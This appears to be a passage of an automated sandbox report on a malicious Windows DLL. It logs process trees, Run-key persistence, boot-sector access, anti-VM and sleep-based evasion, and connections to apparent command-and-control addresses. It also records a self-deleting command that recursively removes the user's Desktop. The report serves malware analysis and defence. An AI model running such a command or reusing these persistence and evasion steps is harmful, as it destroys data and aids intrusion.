Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\NaRZIOq3O8.dll",Group
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\NaRZIOq3O8.dll",Group
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\NaRZIOq3O8.dll",Group
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\NaRZIOq3O8.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\NaRZIOq3O8.dll,GroupJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\NaRZIOq3O8.dll",GroupJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\NaRZIOq3O8.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: mfc42.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: msvcp60.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Binary string: c:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.*Z source: rundll32.exe, 00000003.00000003.2533457815.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2533805373.0000000002B34000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.**.* source: rundll32.exe, 00000003.00000003.3709951057.0000000002B4B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3709925498.0000000002B33000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*\*.*g source: rundll32.exe, 00000003.00000003.1849601371.0000000002B29000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1849653083.0000000002B33000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.**tate\*.*.*H{ source: rundll32.exe, 00000003.00000003.2132721514.0000000002B25000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2134419805.0000000002B31000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*.*m source: rundll32.exe, 00000003.00000003.2413353729.0000000002B37000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2413606315.0000000002B3F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.** source: rundll32.exe, 00000003.00000003.2533457815.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2533805373.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2293300146.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2332381587.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2413695167.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2332599254.0000000002B34000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*.**: source: rundll32.exe, 00000003.00000003.2533864222.0000000002B41000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2533457815.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2533805373.0000000002B34000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10005870 Sleep,LoadLibraryA,GetProcAddress,GetExtendedUdpTable,Sleep,malloc,GetExtendedUdpTable,htons,free,FreeLibrary,3_2_10005870
Source: initial sampleStatic PE information: section where entry point is pointing to: fdss
Source: NaRZIOq3O8.dllStatic PE information: section name: fdss
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002303D pushfd ; mov dword ptr [esp], edi3_2_1002305D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100099FC push eax; mov dword ptr [esp], 2B3AF999h3_2_10009A23
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10009A49 push dword ptr [esp+14h]; retn 0018h3_2_10009A58
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10021AD0 push 3268CA87h; mov dword ptr [esp], ebx3_2_10021ADA
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100212FC pushfd ; mov dword ptr [esp], ecx3_2_10022E4D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100212FC pushfd ; mov dword ptr [esp], edi3_2_10022E51
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10009C3B push dword ptr [esp+2Ch]; retn 0030h3_2_10009C4E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100224AA pushfd ; mov dword ptr [esp], esi3_2_100224C6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10021CF9 push B3A48B18h; mov dword ptr [esp], 1D42FA0Eh3_2_1002213E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10021D30 push B3A48B18h; mov dword ptr [esp], 1D42FA0Eh3_2_1002213E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10021D35 push B3A48B18h; mov dword ptr [esp], 1D42FA0Eh3_2_1002213E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10021D61 push dword ptr [esp+30h]; retn 0034h3_2_10021D6F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100225B0 pushfd ; mov dword ptr [esp], edi3_2_100225B5
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10021DD6 pushad ; mov dword ptr [esp], 4428EA9Bh3_2_10021E1E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002271A push dword ptr [esp+0Ch]; retn 0010h3_2_10022724
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10021F36 pushfd ; mov dword ptr [esp], ecx3_2_10022E4D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10021F36 pushfd ; mov dword ptr [esp], edi3_2_10022E51
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10009760 push eax; mov dword ptr [esp], 6C7BBFF6h3_2_1002979B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10009760 pushfd ; mov dword ptr [esp], CC5FD643h3_2_1002A954
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10010FA0 push eax; ret 3_2_10010FCE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10022FC1 push D32B6479h; mov dword ptr [esp], ebx3_2_10022FC6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10022FC1 pushfd ; mov dword ptr [esp], esi3_2_10022FCA
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1

Persistence and Installation Behavior

barindex
Contains functionality to infect the boot sector
Source: C:\Windows\SysWOW64\rundll32.exeCode function: sprintf,CreateFileA,DeviceIoControl,GetLastError,FormatMessageA,CloseHandle,wsprintfA, \\.\PHYSICALDRIVE%d3_2_1000C190

Boot Survival

barindex
Contains functionality to infect the boot sector
Source: C:\Windows\SysWOW64\rundll32.exeCode function: sprintf,CreateFileA,DeviceIoControl,GetLastError,FormatMessageA,CloseHandle,wsprintfA, \\.\PHYSICALDRIVE%d3_2_1000C190
Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VicityJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10008880 wsprintfA,rand,OpenSCManagerA,CreateServiceA,GetLastError,OpenServiceA,StartServiceA,wsprintfA,wsprintfA,RegOpenKeyA,lstrlen,RegSetValueExA,wsprintfA,RegCreateKeyA,_CxxThrowException,RegSetValueExA,SetLastError,_CxxThrowException,RegCloseKey,RegOpenKeyExA,_CxxThrowException,RegSetValueExA,SetLastError,_CxxThrowException,GetLastError,RegCloseKey,RegCloseKey,3_2_10008880
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VicityJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VicityJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_3-6186
Uses ping.exe to sleep
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10022EE7 rdtsc 3_2_10022EE7
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 180000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 3600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 3765Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 6007Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_3-6872
Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_3-6264
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5916Thread sleep count: 32 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7336Thread sleep time: -600000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7336Thread sleep time: -600000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7336Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1424Thread sleep count: 3765 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1424Thread sleep time: -1129500000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7412Thread sleep time: -3000000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7736Thread sleep time: -720000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7480Thread sleep time: -600000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7332Thread sleep time: -1200000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3192Thread sleep time: -7200000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1424Thread sleep count: 6007 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1424Thread sleep time: -1802100000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7336Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000B3C0 lstrcpy,lstrcat,lstrcat,lstrcat,FindFirstFileA,FindNextFileA,lstrcpy,lstrcat,lstrcat,_strcmpi,PathIsDirectoryA,6D262DD0,strchr,strchr,strchr,strchr,atoi,CreateDirectoryA,Sleep,lstrcat,FindNextFileA,FindClose,3_2_1000B3C0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10005A50 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,3_2_10005A50
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100068C0 6D262DD0,6D262DD0,6D262DD0,strrchr,strncpy,strncpy,strncpy,GetSystemInfo,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,sscanf,3_2_100068C0
Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 60000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 180000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 3600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
Source: rundll32.exe, 00000003.00000002.3755382299.00000000027CB000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: s\Applications\\VMwareHo
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3755445264.0000000002A6F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000003.00000002.3768559853.00000000051E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runsses\Applications\\VMwareHostOpen.exe\Internet Settings\Lockdown_Zones\4_Zones\0x
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWA
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10022EE7 rdtsc 3_2_10022EE7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10005870 Sleep,LoadLibraryA,GetProcAddress,GetExtendedUdpTable,Sleep,malloc,GetExtendedUdpTable,htons,free,FreeLibrary,3_2_10005870

HIPS / PFW / Operating System Protection Evasion

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 202.108.0.52 80Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.241.186 12354Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.241.185 16300Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.241.193 6520Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\NaRZIOq3O8.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
